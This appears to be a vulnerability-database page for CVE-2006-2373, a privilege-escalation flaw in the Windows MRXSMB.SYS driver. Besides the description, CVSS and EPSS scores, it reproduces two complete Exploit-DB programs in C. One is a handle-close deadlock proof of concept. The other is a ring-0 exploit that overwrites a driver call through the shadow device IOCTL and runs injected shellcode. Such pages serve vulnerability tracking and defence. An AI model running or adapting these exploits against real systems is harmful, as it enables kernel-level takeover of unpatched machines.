CVE-2006-2373

OWSAP

A01-Broken Access Control

EPSS

18.21%V4

Vector

Network

Published

2006-06-13
17h00 +00:00

Modified

2018-10-12
17h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to execute arbitrary code by calling the MrxSmbCscIoctlOpenForCopyChunk function with the METHOD_NEITHER method flag and an arbitrary address, possibly for kernel memory, aka the "SMB Driver Elevation of Privilege Vulnerability."

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-264	Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	10		AV:N/AC:L/Au:N/C:C/I:C/A:C	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	43.02%	–	–
2023-03-12	–	–	–	0.53%	–
2023-04-16	–	–	–	0.53%	–
2023-09-17	–	–	–	0.52%	–
2023-12-24	–	–	–	0.63%	–
2024-02-11	–	–	–	0.63%	–
2024-03-24	–	–	–	0.63%	–
2024-06-02	–	–	–	0.78%	–
2024-06-23	–	–	–	0.78%	–
2024-06-30	–	–	–	0.78%	–
2024-10-06	–	–	–	0.82%	–
2024-12-15	–	–	–	0.82%	–
2024-12-22	–	–	–	8.54%	–
2025-02-02	–	–	–	8.54%	–
2025-01-19	–	–	–	8.54%	–
2025-02-02	–	–	–	8.54%	–
2025-03-18	–	–	–	–	13.25%
2025-03-30	–	–	–	–	18.21%
2025-03-30	–	–	–	–	18.21,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	98%
2023-03-12	73%
2023-04-16	74%
2023-09-17	74%
2023-12-24	77%
2024-02-11	78%
2024-03-24	79%
2024-06-02	81%
2024-06-23	81%
2024-06-30	82%
2024-10-06	82%
2024-12-15	83%
2024-12-22	94%
2025-02-02	95%
2025-01-19	94%
2025-02-02	95%
2025-03-18	94%
2025-03-30	95%
2025-03-30	95%

Exploit information

Exploit Database EDB-ID : 1910

Publication date : 2006-06-13 22h00 +00:00
Author : Ruben Santamarta
EDB Verified : Yes

//////////////////////////////////////////////////////////////////////////////// ///////// MRXSMB.SYS NtClose DEADLOCK exploit/////////////////////////////////// //////////////////////////////////////////////////////////////////////////////// //November 19,2005 //////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////// //ONLY FOR EDUCATION PURPOSES //////////////////////////////////////////////////////////////////////////////// // Rubén Santamarta // ruben (at) reversemode (dot) com // http://www.reversemode.com //////////////////////////////////////////////////////////////////////////////// #include <windows.h> #include <stdio.h> #define MAGIC_IOCTL 0x141047 VOID ShowError() { LPVOID lpMsgBuf; FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR) &lpMsgBuf, 0, NULL); MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0); exit(1); } VOID IamAlive() { DWORD i; for(i=0;i<0x1000;i++) { Sleep(1000); printf("\rI am a Thread and I am alive [%x]",i); } } VOID KillMySelf() { DWORD junk; DWORD *OutBuff; DWORD *InBuff; BOOL bResult; HANDLE hDevice; DWORD i; hDevice = CreateFile("\\\\.\\shadow", FILE_EXECUTE,FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) ShowError(); OutBuff=(DWORD*)malloc(0x18); if(!OutBuff) ShowError(); OutBuff[3]=(DWORD)hDevice; DeviceIoControl(hDevice, MAGIC_IOCTL, 0,0, OutBuff,0x18, &junk, (LPOVERLAPPED)NULL); // MAIN THREAD ENDING. } int main(int argc, char *argv[]) { LPTHREAD_START_ROUTINE GoodThread; DWORD dwThreadId; DWORD bResult; GoodThread=(LPTHREAD_START_ROUTINE)IamAlive; printf("-=[MRXSMB.SYS NtClose Vulnerability POC]=-\n"); printf("\t(Only for educational purposes)\n"); printf("..http://www.reversemode.com..\n\n"); printf("Launching Thread ..."); // PUT YOUR "GOOD" OR "BAD" CODE HERE // e.g GoodThread CreateThread(NULL,0,GoodThread,0,0,&dwThreadId); printf("Done\n"); printf("I am going to dissapear,but I will be with you forever\n"); printf("(..)\n\n"); KillMySelf(); // Immortal mode "on" ;) return(1); } // milw0rm.com [2006-06-14]

Exploit Database EDB-ID : 1911

Publication date : 2006-06-13 22h00 +00:00
Author : Ruben Santamarta
EDB Verified : Yes

/////////////////////////////////////////////////////////////////////////////////////// // Mrxsmb.sys XP & 2K Ring0 Exploit (6/12/2005) // Tested on XP SP2 && 2K SP4 // Disable ReadOnly Memory protection // HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\EnforceWriteProtection = 0 // ----------------------------------------------------------------------------------- // ONLY FOR EDUCATIONAL PURPOSES. // ----------------------------------------------------------------------------------- // Rubén Santamarta. // www.reversemode.com // ----------------------------------------------------------------------------------- // OVERVIEW // ----------------------------------------------------------------------------------- // There are 3 possible values to change in order to adjust the exploit to other versions. // # XPSP2 (XP Service Pack 2) // This variable is equal to the File offset of the Call that we are modifying minus 0xC //. #XPSP2 => 3D88020000 cmp eax,000000288 //. 770B ja .000064BBE -- //. 50 push eax //. 51 push ecx //. E812E2FFFF call .000062DCC -- MODIFIED CALL -- // ----------------------------------------------------------------------------------- // #W2KSP4 (Windows 2000 Service Pack 4) // The same method previosly explained but regarding to Windows 2000 Service Pack 4. // ----------------------------------------------------------------------------------- // $OffWord // This variable is defined in CalcJump() Function. // E812E2FFFF call .000062DCC -- MODIFIED CALL -- // The exploit calculates automatically the relative jump, but we need to provide it // the 2 bytes following opcode Call(0xE8). In example, as we can see, to test in XP // OffWord will be equal to 0xE212. ////////////////////////////////////////////////////////////////////////////////////// #include <windows.h> #include <stdio.h> #define XPSP2 0x54BAC #define W2KSP4 0x50ADD #define MAGIC_IOCTL 0x141043 typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*, DWORD , LPDWORD); typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase, LPTSTR lpBaseName, DWORD nSize); VOID ShowError() { LPVOID lpMsgBuf; FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR) &lpMsgBuf, 0, NULL); MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0); exit(1); } DWORD CalcJump(DWORD BaseMRX,BOOL InXP,DWORD *hValue,DWORD *ShellAddr) { DWORD SumTemp; DWORD IniAddress; DWORD i; DWORD sumAux; DWORD addTemp; DWORD OffWord; if(InXP) { SumTemp=BaseMRX+XPSP2+0xE; OffWord=0xE212; } else { SumTemp=BaseMRX+W2KSP4+0xE; OffWord=0xa971; } for(i=0x4c;i<0xDDDC;i=i+4) { sumAux=~((i*0x10000)+OffWord); addTemp=SumTemp-sumAux; if(addTemp>0xE000000 && addTemp<0xF000000){ IniAddress=addTemp&0xFFFFF000; *hValue=i-4; *ShellAddr=addTemp; break; } } printf("\nINFORMATION \n"); printf("-----------------------------------------------------\n"); printf("Patched Driver Call pointing to \t [0x%p]\n",addTemp); return (IniAddress); } int main(int argc, char *argv[]) { PENUMDEVICES pEnumDeviceDrivers; PGETDEVNAME pGetDeviceDriverBaseName; LPVOID arrMods[200],addEx; DWORD cb,i,devNum,dwTemp,hValue,Ring0Addr,junk,ShellAddr,BaseMRX=0; DWORD *OutBuff,*InBuff; HANDLE hDevice; BOOL InXP; CHAR baseName[255]; CONST CHAR Ring0ShellCode[]="\xCC"; //"PUT YOUR RING0 CODE HERE :)" if(argc<2) { printf("\nMRXSMB.SYS RING0 Exploit\n"); printf("--- Ruben Santamarta ---\n"); printf("Tested on XPSP2 & W2KSP4\n"); printf("\nusage> exploit.exe <XP> or <2K>\n"); exit(1); } if(strncmp(argv[1],"XP",2)==0) InXP=TRUE; else InXP=FALSE; pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"), "EnumDeviceDrivers"); pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"), "GetDeviceDriverBaseNameA"); pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb); devNum=cb/sizeof(LPVOID); printf("\nSearching Mrxsmb.sys Base Address..."); for(i=1;i<=devNum;i++) { pGetDeviceDriverBaseName(arrMods[i],baseName,254); if((strncmp(baseName,"mrxsmb",6)==0)) { printf("[%x] Found!\n",arrMods[i]); BaseMRX=(DWORD)arrMods[i]; } } if(!BaseMRX) { printf("Not Found\nExiting\n\n"); exit(1); } addEx=(LPVOID)CalcJump(BaseMRX,InXP,&hValue,&ShellAddr); OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); if(!OutBuff) ShowError(); printf("F000h bytes allocated at \t\t [0x%p]\n",addEx); printf("Value needed \t\t\t [0x%p]\n",hValue+4); InBuff=OutBuff; printf("Checking Shadow Device..."); hDevice = CreateFile("\\\\.\\shadow", FILE_EXECUTE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) ShowError(); printf("[OK]\n"); printf("Querying Device...\n"); while(OutBuff[3]< hValue) { DeviceIoControl(hDevice, // "\\.\shadow" MAGIC_IOCTL, // Privileged IOCTL InBuff, 2, // InBuffer, InBufferSize OutBuff, 0x18,// OutBuffer,OutBufferSize &junk, // bytes returned (LPOVERLAPPED) NULL); printf("\r\t[->]VALUES: (%x)",OutBuff[3]); } if(InXP) Ring0Addr=BaseMRX+XPSP2; else Ring0Addr=BaseMRX+W2KSP4; printf("Overwritting Driver Call at[%x]...",Ring0Addr); DeviceIoControl(hDevice, // "\\.\shadow" MAGIC_IOCTL, // Privileged IOCTL InBuff, 2, // InBuffer, InBufferSize (LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x &junk, // bytes returned (LPOVERLAPPED) NULL); printf("[OK]\n"); for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090; memcpy((LPVOID*)ShellAddr,(LPVOID*)Ring0ShellCode,sizeof(Ring0ShellCode)); printf("Sending IOCTL to execute the ShellCode\n"); DeviceIoControl(hDevice, // "\\.\shadow" MAGIC_IOCTL, // Privileged IOCTL InBuff, 2, // InBuffer, InBufferSize OutBuff, 0x18,// OutBuffer,OutBufferSize &junk, // bytes returned (LPOVERLAPPED) NULL); dwTemp=CloseHandle(hDevice); if(!dwTemp) ShowError(); dwTemp=VirtualFree(OutBuff,0xf000,MEM_DECOMMIT); if(!dwTemp) ShowError(); return(1); } // milw0rm.com [2006-06-14]